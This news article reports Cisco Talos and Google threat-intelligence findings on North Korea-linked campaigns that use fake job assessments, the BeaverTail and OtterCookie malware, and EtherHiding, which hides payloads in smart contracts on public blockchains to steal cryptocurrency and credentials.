Threat actors linked to North Korea are stepping up their cyber operations, using decentralised and evasive malware tools, according to new findings by Cisco Talos and Google Threat Intelligence Group.
The campaigns aim to steal cryptocurrencies, infiltrate networks and evade security controls through sophisticated recruitment scams.
The Evolution of Malware Techniques for Evasion
Cisco Talos researchers identified an ongoing campaign by North Korean group Famous Chollima, which used two complementary malware strains: BeaverTail and OtterCookie.
These programmes, traditionally used for credential theft and data exfiltration, have evolved to incorporate new functionality and closer interaction.
In a recent incident involving an organisation in Sri Lanka, attackers tricked a job seeker into installing malicious code disguised as a technical assessment.
Although the organisation itself was not a direct target, Cisco Talos analysts observed a keylogging and screenshot capture module linked to OtterCookie. This module covertly recorded keystrokes and captured desktop images, automatically transmitting them to a remote command server.
This observation underscores the continued evolution of North Korea-aligned threat groups and their focus on social engineering techniques to compromise unsuspecting targets.
Blockchain Used As Command Infrastructure
The Google Threat Intelligence Group (GTIG) identified an operation by the North Korea-linked actor, UNC5342. The group used a new malware called EtherHiding.
This tool hides malicious JavaScript payloads on a public blockchain, transforming it into a decentralised command-and-control (C2) network.
Using the blockchain, attackers can remotely modify the malware's behaviour without resorting to traditional servers. Law enforcement actions become much more difficult as a result.
In addition, GTIG reported that UNC5342 applied EtherHiding in a social engineering campaign called Contagious Interview, previously identified by Palo Alto Networks, demonstrating the persistence of threat actors aligned to North Korea.
Target: Crypto Sector Professionals
According to Google researchers, these cyber operations typically begin with fraudulent job advertisements targeting professionals in the cryptocurrency and cybersecurity sectors.
Victims are invited to participate in fake assessments, during which they are asked to download files containing malicious code.
What is EtherHiding?
- blackorbird (@blackorbird) October 16, 2025
It's a novel technique where the attackers embed malicious payloads (like JADESNOW and INVISIBLEFERRET malware) within smart contracts on public blockchains (like BNB Smart Chain and Ethereum). https://t.co/AyKeSuPyWW pic.twitter.com/we4NV2PTu5
The infection process often involves multiple malware families, including JadeSnow, BeaverTail and InvisibleFerret. Together, these tools allow attackers to access systems, steal credentials and deploy ransomware efficiently. Their ultimate targets range from espionage and financial theft to long-term network infiltration.
Cisco and Google have published Indicators of Compromise (IOCs) to help organisations detect and respond to ongoing cyber threats linked to North Korea. Researchers warn that the integration of blockchain and modular malware will likely continue to complicate global cybersecurity defence efforts.
